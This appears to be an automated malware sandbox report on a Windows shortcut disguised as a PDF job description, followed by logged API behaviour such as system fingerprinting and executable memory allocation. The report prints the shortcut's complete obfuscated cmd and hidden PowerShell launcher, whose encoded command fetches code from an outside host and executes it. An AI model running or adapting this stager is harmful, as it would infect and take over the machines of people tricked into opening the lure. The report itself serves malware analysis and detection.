Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Nov. 17, 2023, 2:21 p.m.	Nov. 17, 2023, 2:23 p.m.

Size	5.0MB
Type	MS Windows shortcut, Has Working directory, Has command line arguments, Icon number=2, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hide
MD5	`9fcea5ddaa37780e9ae0a8415ded4b84`
SHA256	`5a630ce43f25aa2463195ad4403f78e29b740dda82ba35b9f54c513a892998d9`
CRC32	`32F9F89C`
ssdeep	`384:a6cXg9IS3LWovBBgkrXWzfMN5bt0GHI8kklOlmC:BMgPSop1rXWbOVOGTOY`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "djoMrZ" C:\Users\test22\AppData\Local\Temp\MLB_KOREAN_JOB_DESCRIPTION.pdf.lnk
2552
- cmd.exe "C:\WINDOWS\system32\cmd.exe" /c set "TjnHYfRxWa=YQBzAGUANg" && set "XxwtDJaPct=sAIAAkAHkA" && set "bDwtozZyqE=0APQAiACkA" && set "BIVGlNsNoU=dAByAHkAew" && set "TcluocXKfb=AgAC0AZwB0" && set "zMIBZriQBh=QAdQByAGkA" && set "ZZusqJZmtQ=xecutionPo" && set "yFXoGrtJrL=4AYwBvAGQA" && set "MmMqeWIOFi=ACAAMAApAA" && set "EqIdOrRmjn=BTAGwAZQBl" && set "qtKFTTYurE=AGkAbgBnAC" && set "snEVWQpOuP=AEcAVgBpAE" && set "TMaEbbgsQT=bgB0ADsACg" && set "RmAFlbgkZU=MAIAAxADUA" && set "mEveuglXTa=AAoAJABjAG" && set "RiGCrpUpab=AHcAWgB3AD" && set "NWLWNbWdCY=QwBvAG4Adg" && set "uKwwRshDBH=cQB1AGUAcw" && set "TyzfJstCFR=BNAG0AVQAy" && set "NfTMXIilyz=B5AGUAKQA7" && set "fFsezeqgeq=QAZQBuAHQA" && set "KgWpffnYAW=A9AD0AIgAp" && set "zhraxSSzuI= "" powers" && set "SdmiBxLDtW=ADoAOgBGAH" && set "zwZZhreAAq=AHQALgBFAG" && set "roifXiuEUg=EASABSADAA" && set "rOmxHGNTgd=AEMASQBJAC" && set "qZLdtCgkin=BuAGcAKABb" && set "fynWIDORfN=AoAFsAUwB5" && set "ihwOxETVfk=Command JA" && set "dchNDOhYMZ=AEkALgBHAG" && set "QJhOrKXjCB=AAkAewAKAA" && set "MhrUTNGYFx=B0AHIAaQBu" && set "lfZAeaeKgt=ACkAOwAKAC" && set "kKsTLYyupN=AHcAcAAgAC" && set "sNPYhFfxWg=AGIAeQBlAD" && set "TpSIyPtwZv=UAdABTAHQA" && set "KkkXMtHfZU=ZQBtAC4AVA" && set "WHNdSAzHNf=BCAHoATAAy" && set "rNyOCSQIKg=BuAHYAbwBr" && set "dWYFHRStXF=0AWwBTAHkA" && set "bkVkhPTSec=NoLogo -No" && set "QeVrJoypwB=ADEAOwAKAA" && set "RUaWyRHQuU=IAbABZADIA" && set "FpUOTNStKA=AGcAKAAiAG" && set "VYNegyYlXL=AGUAVwBSAG" && set "qIKCUwBAij=0ALgBDAG8A" && set "EoowUnpyYh=indowStyle" && set "DfsnUcTgFg=AFkAagBnAH" && set "BnCmaRDKwV=IAA9ACAAMQ" && set "LZfAavpFYm=AEUAbgBjAG" && set "QEhDXYbieC=UAKAAkAGMA" && set "VLQrvNbsvi=AHoATABuAF" && set "uJfzqLEKfc=KQA7AAoAJA" && set "sBejxLYLRs=IAA9ACAAKA" && set "CABYzgxxvr=bwB1AG4AdA" && set "ucVjukLiUo=start /min" && set "briQMnmKwu=8AbgB0AGUA" && set "cUspthchmF=MAeQBzAHQA" && set "bDCaPovznl=ZwB2AFoAZw" && set "lLiNvvsyHR=AuAFQAZQB4" && set "lvMKFTtJON=AHAAIAAtAH" && set "yJRnVfsvnj=AGMAbwBuAH" && set "usjZfmaFEE=AHAAPQBbAF" && set "dxVJkbAfud=BlAHgAdAAu" && set "fXwjcPVYLt=cAByAGUAcw" && set "GoGsnQnaWQ=eABsAEwAMw" && set "EUegkQmPFZ=AFMAeQBzAH" && set "AHQVhJQFkw=gAIgBhAFcA" && set "lbWAUubWaU=bgB2AGUAcg" && set "jUrJQWBMnl=AgAC0APQAg" && set "FncKXuOuBq=AJAAkAYgBy" && set "ovxVxqlhIr=IAAtAFUAcw" && set "aDaRlJPjdb=BlAHIAdABd" && set "bnJWBwevld=0AQgBhAHMA" && set "qheQdOsxFy=ZQA2ADQAUw" && set "eqgCyTWOdO=YwBIAE0ANg" && set "brdcQqNkUD=AKAAkACQAk" && set "kiRfpiioRm=B6AGQAbABN" && set "mSfXwDbnfy=AKAH0ACgA=" && set "hKWOQKomJA=WgBqAGcAeg" && set "CdfUWpIjbg=NABaAEQAYw" && set "QfQNxampWp=BMAHkAOQB0" && set "NhpKzjZEKH=0AVwBWAGgA" && set "jEDkeIrPfl=cATQBXAEUA" && set "EUzKheKIZQ=IAA9ACAASQ" && set "odfhiqYUUz=B5AGQAdQB2" && set "sceysoispa=gAZABHAEYA" && set "ehEGAHjiti=IAbwBtAEIA" && set "iLjcIMbryB=ACAAJABjAG" && set "ZHfDZDjgfR=UAYgBSAGUA" && set "ytLfgwbtYo=A6ADoAQQBT" && set "DIqxJWEcWP=AkAGkAcwB1" && set "gsxhMcHUWS=AJAAkASQBu" && set "CUqShwKEaH=sACgAJAH0A" && set "rppWWkilnL=8AZABpAG4A" && set "GyqShYfrXf=AGgAaQBsAG" && set "ZOXKrOSKdN=YQByAHQALQ" && set "hsfywJokQA=EAcgBzAGkA" && set "bCqmXvKujn=B0AF0AOgA6" && set "oIvYUHvtVL=B0ACAALQBV" && set "xaWfxreeLe=AHMAdABlAG" && set "zuUXwkFdnO=s -Encoded" && set "GXxBHSTMdH=MgBRADAAWQ" && set "rsIQUsNlkm=aQBuAGcAXQ" && set "ETqoSfTRik=UwB0AHIAaQ" && set "FVFJBFYJfr=ZwBdADoAOg" && set "btnYpOFMnb=BzAGkAbwBu" && set "VOaCORREdU=8AdQBuAHQA" && set "qyuXVxOLbl=AEYAcgBvAG" && set "FhqfnpmgSH= hidden -E" && set "wMESCJLjmS=bwB1AG4AdA" && set "QxZTecsJUN=A1AEwAbQBw" && set "OEzksKkxlb=AGUAYQBrAD" && set "TatfGwoMOf=cwB0AGUAbQ" && set "LmOCYEfCmj=AGkAYwBQAG" && set "uuqfIlaqLf=UALQBFAHgA" && set "JjtTKfdVpE=kACQAkAGMA" && set "wOmIWVIxUD=OwAKAAkAfQ" && set "vWzfPwZZCL=AGUALQBXAG" && set "mqBIVdfolH=kACQBTAHQA" && set "ReqWKmxvIW=NQBlAEcANQ" && set "ZpivkNWzqU=licy bypas" && set "APrDhxXOtJ=AwADsACgB3" && set "vOKQgfXssa=oAewAKAAkA" && set "fLfoRKHUPY=AHIAaQAgAC" && set "gxfsAbxZwa=AFYAbQBPAF" && set "IoUEJKKCup=A0AFMAdABy" && set "FIBEVNoySs=CgAJAGMAYQ" && set "wGAGFuCgcm=cgBpAG4AZw" && set "iPluMIEhFh=BlAEIAYQBz" && set "bsSNPRwkSd=ZAB1AHYAYg" && set "VeHElgDcva=BvAGUAbQBO" && set "IJCSLLAcox=QAdQByAGkA" && set "FhMwlnEESP=hell.exe -" && set "rWiAduopww=Profile -W" && set "bIgWAgOjfP=4ARwBlAHQA" && set "TfrYJcMrsc=cASQAzAE0A" && set "lJUzkPKMYd=AHYAbwBrAG" && set "GWMjUKeJXq=BBAFMAQwBJ" && set "ySjgGpmQmr=B0AGMAaAAK" && set "pIVrtuwCCH=BpAHMAdQB3" && set "yzlxQSyhfd=bgBnADsACg" && set "ISoiKxxYFC=QAZQBtAC4A" && call %ucVjukLiUo%%zhraxSSzuI%%FhMwlnEESP%%bkVkhPTSec%%rWiAduopww%%EoowUnpyYh%%FhqfnpmgSH%%ZZusqJZmtQ%%ZpivkNWzqU%%zuUXwkFdnO%%ihwOxETVfk%%odfhiqYUUz%%sNPYhFfxWg%%dWYFHRStXF%%TatfGwoMOf%%lLiNvvsyHR%%zwZZhreAAq%%yFXoGrtJrL%%rsIQUsNlkm%%ytLfgwbtYo%%rOmxHGNTgd%%bIgWAgOjfP%%ETqoSfTRik%%qZLdtCgkin%%EUegkQmPFZ%%ISoiKxxYFC%%NWLWNbWdCY%%aDaRlJPjdb%%SdmiBxLDtW%%ehEGAHjiti%%TjnHYfRxWa%%IoUEJKKCup%%qtKFTTYurE%%AHQVhJQFkw%%GoGsnQnaWQ%%WHNdSAzHNf%%gxfsAbxZwa%%TfrYJcMrsc%%GXxBHSTMdH%%kiRfpiioRm%%snEVWQpOuP%%NhpKzjZEKH%%hKWOQKomJA%%TyzfJstCFR%%DfsnUcTgFg%%jEDkeIrPfl%%CdfUWpIjbg%%QxZTecsJUN%%RiGCrpUpab%%bDwtozZyqE%%uJfzqLEKfc%%pIVrtuwCCH%%usjZfmaFEE%%cUspthchmF%%KkkXMtHfZU%%dxVJkbAfud%%LZfAavpFYm%%rppWWkilnL%%FVFJBFYJfr%%GWMjUKeJXq%%dchNDOhYMZ%%TpSIyPtwZv%%wGAGFuCgcm%%fynWIDORfN%%xaWfxreeLe%%qIKCUwBAij%%lbWAUubWaU%%bCqmXvKujn%%qyuXVxOLbl%%bnJWBwevld%%qheQdOsxFy%%MhrUTNGYFx%%FpUOTNStKA%%roifXiuEUg%%eqgCyTWOdO%%QfQNxampWp%%VYNegyYlXL%%sceysoispa%%ReqWKmxvIW%%VeHElgDcva%%VLQrvNbsvi%%RUaWyRHQuU%%bDCaPovznl%%KgWpffnYAW%%lfZAeaeKgt%%zMIBZriQBh%%sBejxLYLRs%%DIqxJWEcWP%%kKsTLYyupN%%XxwtDJaPct%%bsSNPRwkSd%%NfTMXIilyz%%mEveuglXTa%%VOaCORREdU%%BnCmaRDKwV%%APrDhxXOtJ%%GyqShYfrXf%%QEhDXYbieC%%CABYzgxxvr%%TcluocXKfb%%MmMqeWIOFi%%vOKQgfXssa%%BIVGlNsNoU%%brdcQqNkUD%%yJRnVfsvnj%%fFsezeqgeq%%EUzKheKIZQ%%rNyOCSQIKg%%vWzfPwZZCL%%ZHfDZDjgfR%%uKwwRshDBH%%oIvYUHvtVL%%fLfoRKHUPY%%IJCSLLAcox%%ovxVxqlhIr%%iPluMIEhFh%%LmOCYEfCmj%%hsfywJokQA%%yzlxQSyhfd%%gsxhMcHUWS%%lJUzkPKMYd%%uuqfIlaqLf%%fXwjcPVYLt%%btnYpOFMnb%%iLjcIMbryB%%briQMnmKwu%%TMaEbbgsQT%%FncKXuOuBq%%OEzksKkxlb%%CUqShwKEaH%%FIBEVNoySs%%ySjgGpmQmr%%QJhOrKXjCB%%JjtTKfdVpE%%wMESCJLjmS%%jUrJQWBMnl%%QeVrJoypwB%%mqBIVdfolH%%ZOXKrOSKdN%%EqIdOrRmjn%%lvMKFTtJON%%RmAFlbgkZU%%wOmIWVIxUD%%mSfXwDbnfy%
  2704
  - powershell.exe powershell.exe -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand JAB5AGQAdQB2AGIAeQBlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAFcAeABsAEwAMwBCAHoATAAyAFYAbQBPAFcASQAzAE0AMgBRADAAWQB6AGQAbABNAEcAVgBpAE0AVwBWAGgAWgBqAGcAegBNAG0AVQAyAFkAagBnAHcATQBXAEUANABaAEQAYwA1AEwAbQBwAHcAWgB3AD0APQAiACkAKQA7AAoAJABpAHMAdQB3AHAAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAGEASABSADAAYwBIAE0ANgBMAHkAOQB0AGUAVwBSAGgAZABHAEYANQBlAEcANQBvAGUAbQBOAHoATABuAFIAbABZADIAZwB2AFoAZwA9AD0AIgApACkAOwAKACQAdQByAGkAIAA9ACAAKAAkAGkAcwB1AHcAcAAgACsAIAAkAHkAZAB1AHYAYgB5AGUAKQA7AAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADsACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAAoAewAKAAkAdAByAHkAewAKAAkACQAkAGMAbwBuAHQAZQBuAHQAIAA9ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGkAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnADsACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABjAG8AbgB0AGUAbgB0ADsACgAJAAkAYgByAGUAYQBrADsACgAJAH0ACgAJAGMAYQB0AGMAaAAKAAkAewAKAAkACQAkAGMAbwB1AG4AdAAgAC0APQAgADEAOwAKAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADUAOwAKAAkAfQAKAH0ACgA=
    2808
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 17, 2023, 2:21 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 17, 2023, 2:21 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 17, 2023, 2:21 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 17, 2023, 2:21 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 17, 2023, 2:21 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 17, 2023, 2:21 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 17, 2023, 2:21 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a72e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7860 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7860 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7860 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7a60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7a60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7a60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7a60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7a60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7a60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a72a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a72a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a72a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7860 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7860 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7860 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a6ea0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7860 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7860 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7860 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7860 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7860 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7860 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7860 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7b20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7b20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7b20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 17, 2023, 2:21 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a7b20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 17, 2023, 2:21 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 136 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 17, 2023, 2:15 p.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000046f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0215a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02152000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02162000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0279a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02163000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02164000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0215b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02792000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02165000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0279c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2023, 2:21 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
